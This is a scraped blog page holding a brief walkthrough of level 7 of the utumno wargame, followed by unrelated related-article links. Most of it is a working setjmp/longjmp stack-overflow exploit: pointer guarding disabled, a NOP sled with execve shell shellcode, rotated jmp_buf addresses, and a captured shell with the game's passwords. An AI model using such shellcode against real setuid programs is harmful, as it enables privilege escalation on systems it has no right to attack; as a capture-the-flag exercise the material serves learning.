utumno - 7
2016-04-13 15:02
211 查看
root@today:~/Desktop/misc/utumno/utumno6# ssh utumno7@178.79.134.250 utumno7@178.79.134.250's password: totiquegae utumno7@melinda:~$ mkdir /tmp/utu7 utumno7@melinda:~$ cd /tmp/utu7 utumno7@melinda:~$ export LD_POINTER_GUARD=0 (LD_POINTER_GUARD (glibc since 2.4) Set to 0 to disable pointer guarding. Any other value enables pointer guarding, which is also the default. Pointer guarding is a security mechanism whereby some pointers to code stored in writable program memory (return addresses saved by setjmp(3) or function pointers used by various glibc internals) are mangled semi-randomly to make it more difficult for an attacker to hijack the pointers for use in the event of a buffer overrun or stack-smashing attack.)
# stack environment --------- eip (rol eip, 0x09 ; rotation left 9bits) --------- esp (rol esp, 0x09 ; rotation left 9bits) --------- ebp --------- edi --------- esi --------- ebx --------- jmp_buf(esp + 0x90) 128B --------- buffer(esp + 0x10) #we use gdb to get the buffer address. it's 0xffffd420 #rol 0xffffd420,0x9 == 0xffa841ff #we set jmp_buf.esp = 0xffa841ff, jmp_buf.eip = 0xffa841ff
utumno7@melinda:/tmp/utu7$ /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'` ^Z [1]+ Stopped /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'` utumno7@melinda:/tmp/utu7$ jobs -l [1]+ 27875 Stopped /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'` utumno7@melinda:/tmp/utu7$ kill -10 27875 utumno7@melinda:/tmp/utu7$ fg /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'` ^Z [1]+ Stopped /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'` utumno7@melinda:/tmp/utu7$ kill -12 27875 utumno7@melinda:/tmp/utu7$ fg /utumno/utumno7 `python -c 'print "\x90" * 120 + "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\xff\x41\xa8\xff\xff\x41\xa8\xff"'` $ whoami utumno8 $ cat /etc/utumno_pass/utumno8 jaeyeetiav $
ref[1]: http://hacktracking.blogspot.com/2013/06/utumno-wargame-level-7.html
相关文章推荐
- 安卓_延时操作;
- 《Effective Objective-C 2.0:编写高质量iOS与OS X代码的52个有效方法》 笔记2 多用字面量语法,少用与之等价的方法
- Cocos2dx:Cocos Studio2.0发布的CSB资源在Cocos2d-x中的使用
- 数据文件数据加载到hive表
- *str++简介
- javascript 高级程序设计 十
- vim命令
- mysql 列转行,合并字段(行转列)
- Spring错误:org.mybatis.spring.MyBatisSystemException: nested exception is org.apache.ibatis.binding.Bi
- html学习之路——第一天(1)
- WinCE 下怎么获取路由表和增加路由?
- C++随机数生成实例讲解
- 安卓开发培训(3.2 使用SharedPreferences实现Android数据读写操作)
- mac下使用github 上传代码
- 动态规划:最大子段和
- java异常处理(隐式抛出、显示抛出、直接处理)
- iosiPhone屏幕尺寸、分辨率及适配
- 使用Appium做手机app自动化时,红米2手机(已ROOT)时不时的弹出覆盖安装Appium Android Input Manager for Unicode的输入法的提示的解决办法
- MySql数据引擎简介与选择方法
- hdu4035之经典慨率DP